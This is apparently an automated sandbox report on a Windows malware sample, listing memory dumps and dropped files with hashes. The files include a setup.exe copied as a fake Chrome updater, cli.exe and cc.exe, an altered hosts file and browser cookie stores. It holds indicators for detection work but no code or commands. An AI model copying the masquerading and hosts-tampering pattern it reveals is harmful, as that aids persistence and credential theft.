SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1912-146-0x0000000004390000-0x00000000055B6000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2436-147-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-148-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2436-149-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-150-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-151-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-152-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-153-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-154-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/1912-155-0x0000000004390000-0x00000000055B6000-memory.dmp

memory/2436-156-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-157-0x000000013FED0000-0x00000001410F6000-memory.dmp

memory/2436-162-0x0000000077920000-0x0000000077AC9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2232-166-0x0000000000210000-0x000000000049B000-memory.dmp

memory/1704-164-0x000000000C1B0000-0x000000000C43B000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/2232-167-0x0000000000210000-0x000000000049B000-memory.dmp

memory/1048-168-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1048-170-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1048-176-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1048-178-0x0000000000400000-0x0000000000527000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1048-181-0x0000000000400000-0x0000000000527000-memory.dmp

memory/1048-184-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-183-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-182-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-185-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-186-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-187-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-188-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-189-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-190-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-191-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-192-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-193-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-195-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-194-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-197-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-198-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-196-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-199-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-200-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-202-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-201-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-203-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-204-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-207-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-208-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-206-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-210-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-209-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/1048-212-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-211-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-213-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-215-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-214-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-216-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-217-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-218-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-220-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-219-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-221-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-222-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-223-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-224-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-225-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-226-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-227-0x00000000FFFA0000-0x00000000FFFB0000-memory.dmp

memory/1048-261-0x0000000077B1F000-0x0000000077B20000-memory.dmp

memory/1704-262-0x000000000C1B0000-0x000000000C43B000-memory.dmp

memory/2232-267-0x0000000000210000-0x000000000049B000-memory.dmp

memory/2416-268-0x000000001B110000-0x000000001B3F2000-memory.dmp

memory/2416-269-0x0000000002250000-0x0000000002258000-memory.dmp

memory/2416-270-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

memory/2416-271-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-273-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-272-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-274-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

memory/2416-275-0x00000000027E0000-0x0000000002860000-memory.dmp

memory/2416-276-0x000007FEF5140000-0x000007FEF5ADD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 7434eef5797967ed5f579f16eda17a36
SHA1 3e212d805cba7e1e7f06c80121528519e3081ee3
SHA256 79d8ca8a550d9f7848b8e4b2bbd2e6d62f22727347d70a4e5a57cc5bb307e479
SHA512 3cd0133b91878ddec309d42a53b3206f2762b98294f4aff4e6474aea345d89d9e38c3784ac7d42070f40e1afeb48e7e1f9ab6d6a14e837c0dadc046b61a6400e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VHDQHNMG7T93SEJE9BK9.temp

MD5 7434eef5797967ed5f579f16eda17a36
SHA1 3e212d805cba7e1e7f06c80121528519e3081ee3
SHA256 79d8ca8a550d9f7848b8e4b2bbd2e6d62f22727347d70a4e5a57cc5bb307e479
SHA512 3cd0133b91878ddec309d42a53b3206f2762b98294f4aff4e6474aea345d89d9e38c3784ac7d42070f40e1afeb48e7e1f9ab6d6a14e837c0dadc046b61a6400e

memory/3052-283-0x000000001B280000-0x000000001B562000-memory.dmp

memory/3052-284-0x0000000002250000-0x0000000002258000-memory.dmp

memory/3052-286-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-285-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/3052-287-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-289-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-288-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

memory/3052-290-0x0000000002700000-0x0000000002780000-memory.dmp

memory/3052-291-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2436-295-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2436-296-0x000000013FED0000-0x00000001410F6000-memory.dmp

\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1704-301-0x000000000C170000-0x000000000C7A4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/1704-305-0x0000000074620000-0x0000000074D0E000-memory.dmp

memory/2176-306-0x0000000077B10000-0x0000000077B12000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/2132-310-0x000000013F9E0000-0x0000000140C06000-memory.dmp

memory/2176-312-0x0000000000C20000-0x0000000000C90000-memory.dmp

memory/2176-313-0x0000000073820000-0x0000000073F0E000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

memory/1728-315-0x000000013F9E0000-0x0000000140C06000-memory.dmp

memory/2176-316-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-317-0x0000000002F10000-0x0000000002F7C000-memory.dmp

memory/2176-318-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-319-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/1728-320-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2176-321-0x00000000000D0000-0x0000000000704000-memory.dmp

memory/2176-322-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-324-0x0000000003150000-0x0000000003202000-memory.dmp

memory/2132-326-0x000000013F9E0000-0x0000000140C06000-memory.dmp

memory/2176-332-0x0000000073820000-0x0000000073F0E000-memory.dmp

memory/1728-347-0x000000013F9E0000-0x0000000140C06000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\CrashpadMetrics-active.pma

MD5 03c4f648043a88675a920425d824e1b3
SHA1 b98ce64ab5f7a187d19deb8f24ca4ab5d9720a6d
SHA256 f91dbb7c64b4582f529c968c480d2dce1c8727390482f31e4355a27bb3d9b450
SHA512 2473f21cf8747ec981db18fb42726c767bbcca8dd89fd05ffd2d844206a6e86da672967462ac714e6fb43cc84ac35fffcec7ddc43a9357c1f8ed9d14105e9192

memory/2176-369-0x0000000005CC0000-0x0000000005D00000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Local State

MD5 e6da6a85878383b7efb0725b3ffa6533
SHA1 bb665aa670ce17593301aaf762002ba2c99518c5
SHA256 980fdc354b3771fc6c4a1e205768bdc4b9f214473da88481e2d807b88ebbbc48
SHA512 8dded67e8d879d9c7804479c994f3d5b79859f98bc8b175c10f08e728a0cb822399f88e66c07964c4116ead3177201dd16eb7daf84c832bd4e46ee2c1cafa8fb

\??\pipe\crashpad_2292_ZFWUGDSUEDLEYQVC

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\LOG

MD5 eb0651fa85b42ccfbb99ba6f0b521bbc
SHA1 96c333c6465f9a9a0362ee3fac68969fcfafc603
SHA256 6228546dd2e2a7bce4e70971962ba386a869d4084801dfba0dff87aeb67922e5
SHA512 f1e687afd24ebcd352992184bf8f8bf0ee9a34d21d85557abfee668179e14e1672c33bf10f14beef29f48fdd95e77723fab9523f2ab46410d9a1c3714910dd73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Local Storage\leveldb\LOG.old

MD5 f6bfa7b546513ea42975fa47714913d4
SHA1 f89fd1d28f5c2ddc67ccf3723ee0101b4fceb6ea
SHA256 73fc943c4b40df27f343ddb47e94dbe7cc282f549cabbe118edd1c1becf616b3
SHA512 45a43dcc4b0b5c5c02cc872862d02545ede7400033728f2afa7e6728e7a6fe310dcd95d84dff9ab4c47b9df9b261fee96447d48183edef44a69739659cc5f91c

memory/2176-398-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-399-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/1728-400-0x0000000077920000-0x0000000077AC9000-memory.dmp

memory/2176-401-0x0000000005CC0000-0x0000000005D00000-memory.dmp

memory/2176-405-0x0000000002B50000-0x0000000002B92000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Session Storage\CURRENT~RFf78b165.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/2300-427-0x0000000019B50000-0x0000000019E32000-memory.dmp

memory/2300-428-0x000007FEF3980000-0x000007FEF431D000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\DawnCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_0

MD5 62dd3b29676a9d080081b4c165b838d5
SHA1 7930652efbb47ff8673a57f68721a08f24042327
SHA256 0bcd45445c5d1f8747a7c2fe7ea70481bd465bd32eaccef8d0471a4c648ffba4
SHA512 881e4b5c97f0fbb7a85c5ff0f6a591a6522ca7c5cdb4fe98e6e5b7f753c70cc4c3708f5fb04e42f11e6f16a3fd0cbe8545481c477d138c5d2fa28c822db55394

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\f_000002

MD5 eb723177494d2a7ab37d1656193bdde4
SHA1 3a15a91bfa96872c8c76dab5e2962a50471020e9
SHA256 ea3faa1f4bfd9dfb46fd7a04f7291a55a5c49801150742f58b1dc0289fe87a81
SHA512 e56f146ae7dcbef2729d106ed7c4ffe7ccb816a5a8e08a43dc36790bcaf5782cb5e1d4c1f28407bcd7e6bedf6d96c17b7a4a1449fc503130a6add6dcca6928e8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_3

MD5 f74a3111e7fb98fcf534f2a6335966dc
SHA1 f12fa2b01234619c89639ed16a70febb76339980
SHA256 b19b16a827450528c6d8aeeb71b9b0432a2c6e731e094e6287a37c081107a9bb
SHA512 ab9a80c0c26c509d4a8c66524db54ce5f3ef33b8f13fbdf797482d03d58abcefbb7cd816c98bd36d794a97daec8004c1e96e3e82c22c57bd20d283d221a650e3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_2

MD5 eb4af17f64c6ee43d0d2c4b46e97af74
SHA1 fe544bc550e7a2834432ca1eac44a120b0a0f44b
SHA256 3177c16884751aac02c0e70aaa64f5acc45066f0d0521742ec0a0db4135531e3
SHA512 99f9d4a64c85cf48615ec38a3ba04af78a3e3553d1bd6dd4c62b343b1ab3dc3cd9159a71cebebce4e4eaff568e26ba5b7c518c12703a49c3f367c89ea004c0c0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Cache\Cache_Data\data_1

MD5 67223050889282a4d4945dfa19ebc7c6
SHA1 e3a13041fd90228840287aef43828c37c9df87da
SHA256 53f7d56bc43fa646c5b3be3d0cf14922707a3c82cea9841f645f05a69e9fbc3e
SHA512 a9e8a80109f7b88044e42141a2ebb2b7b6fdd1f83df1ca78048f8de2967a1a92f70e464deb8910c555ad4bf5bfc8352f53b1218b1eac62b7714805d25b648815

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\chrome_debug.log

MD5 1503d8c4fbd3e2eb92b4d891fc715538
SHA1 b5bf2ef00a1a7ca3e6b3f0531edd61b4362b693e
SHA256 f64c320ab33ad1f8a842e888e670eac01885d430ac4b89213c3e47bb18c5b4ba
SHA512 fa0c96daf560f679bd2a755d8668d7b8bd5ac142f4c644475f2687228b907246f33a0d4adb4d7920ad97fa59259d0490a6e2a0192584aab3e38240e1f3d2f04f

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Crashpad\settings.dat

MD5 0e3044b23d1fa4457d11bb20acc7f0f8
SHA1 0afaf2659f70fe1185755f909c85ab82caff0de2
SHA256 de50b50b12f2844df566eee05df76964230422505fa30424b0bffd5afe868228
SHA512 a57c2b5355062ec2f21d942e36aaded4b8c0996a5d8ce1a62396f9be2d0fa66391ea473e9e65268dfc5fcaa19300fa158c53e5bd7b6fd160d662a42b044cd847

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\DevToolsActivePort

MD5 b42df24cadb5265cd4bd266b67b236ff
SHA1 6d09d9795bf0bafaffbfccb37fe050b199e09e4d
SHA256 82277b27fa484b19953618dc9f5a9b3a2a679dcf7d461845f1f5b2c487f707d7
SHA512 7048176e21c69acb3aa12bc247e3833c6bd5755cec52f19b9fc7714b92dd68d368459b02cce5badb73f4290f79dfbd8012a7f825f39731e7994b6f6ad3d81750

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\03c93927cb3db117_0

MD5 1962a1c420f3c8c192b96e7cb4f60afe
SHA1 55f81b611c273e3d09b379baf327aeb1f835d5a2
SHA256 5cd3a5c785dc927090438d8fc7bdc0b18d9cc5f0cb119a4f9fc77262af65f343
SHA512 af3eafb626768b42f0e0c323d637307d5a3f048ae6e717bc8b44709b20e15902dd94f00424acd88d67a653e63c9fd0e2e93947b338cd679edce88aeeb82ff1a2

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\5ddeaca7fe64ca95_0

MD5 18d2c3c4aa856ae246c286a07cd37567
SHA1 16d50babe2825c58ed789a74979e8fe05045af81
SHA256 76e7463c80d26881e179f4c35f7e5e51450399b3d8b2929414ba00e1cc6376f0
SHA512 844ae5325fc26a944d9e9cf1490375432febef2105dcf67a1a32632385b043f0ff354bdbaf0d71de7c48f8fcd491eeffd979aa5fbe7729d3fed915d09e49b958

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\5b76df05a935e848_0

MD5 607da4e0e9ebaf5856eedfa90a3cdb3c
SHA1 2ddf9e672f8064d75513db47d53376bf175226ec
SHA256 352cdb426922d7a077019a05f161fdc1fbae895d8714f6967fb5996e81dddb90
SHA512 1e66f2ba13d21099b345e29acb282b9603027eecb561823f62690446f459b1f0cb5c7021c20abd372dd25ee34612f3f5a40ab5166627569eae0e2cb8008dc260

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\54cb805dcd317636_0

MD5 f8dab46f36aedb4223192566159adb6d
SHA1 b409ac62b9a27a1e600d57a68415ff34092656af
SHA256 7918444873706d39a7cdb31b0e2baff7962f5082d2990aed38539680d70fd31f
SHA512 eb63d30928965bcfa6597aa21f0cc5915480bbdd34876688061f6b1ae41a9d1e7a755157848da55664e9a52100caecef60867d964be394d1e06efb8fa41e49d8

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\474aa3bf634a0814_0

MD5 769668fdcded9526f57e0e9249e47af8
SHA1 60f43098064f555f5fb3e8480390805a20732e92
SHA256 2ed9c7a94f7fde9499fdb1e4fbbc286a094a85fc0def04442157d7a239296f45
SHA512 f38f7b0bdc77f230d2f6e827ada63f53c7ce5b40eb98f5bb1fe66bc7e6fdc732e291eb2af37945f66d144796d2d91d6d03614c8d14834228ee0987f3967e3c68

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\30dea7dd8c4c2a2b_0

MD5 a07bf8aa73c968bc953a2131144daa44
SHA1 496f9735c2240b52b6a8ed7e5e578fe65330f3c0
SHA256 61be7055b770d86fb47e02b7656a55f1e1c50497399adcd68f037bc549910a34
SHA512 af97f47d360ed32e15555dbbe3ff052fc1dd9d582ad3105fc8a2f5c67906e6c53ccd91e762eb56fb077f312604437edc56f06a5af289fd08d8d541cf68f55096

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\2e64514b9cd267ab_0

MD5 f6e8e771f39e2a246e1bbca764b3bc46
SHA1 9db86d9ddf92c5f2b766d7c28538d10556145f40
SHA256 4ebdd40c31c8fa163c992bfb082496cf3dd378b44ab8800671fbebc0cddc714d
SHA512 d1cf3ae19d192e3cc6410138690e0854c1d68765d8f5bb4b832ec8c5f468fede25130bc4cc551e23d58a59b130a823ba29812631bfe25508b9de0ed578f595c6

C:\Users\Admin\AppData\Local\Google\Chrome\User DataATKXR\Default\Code Cache\js\17e99028d152eccd_0

MD5 e6ece6f275b07679bbce94dd0846c4c4
SHA1 7b957ae35c2b26c71406e15ee4a4d933059093a4
SHA256 0907e13956324811a0ee8e3b3feb3abeb168412888edc84121d6f3dcd04b7466
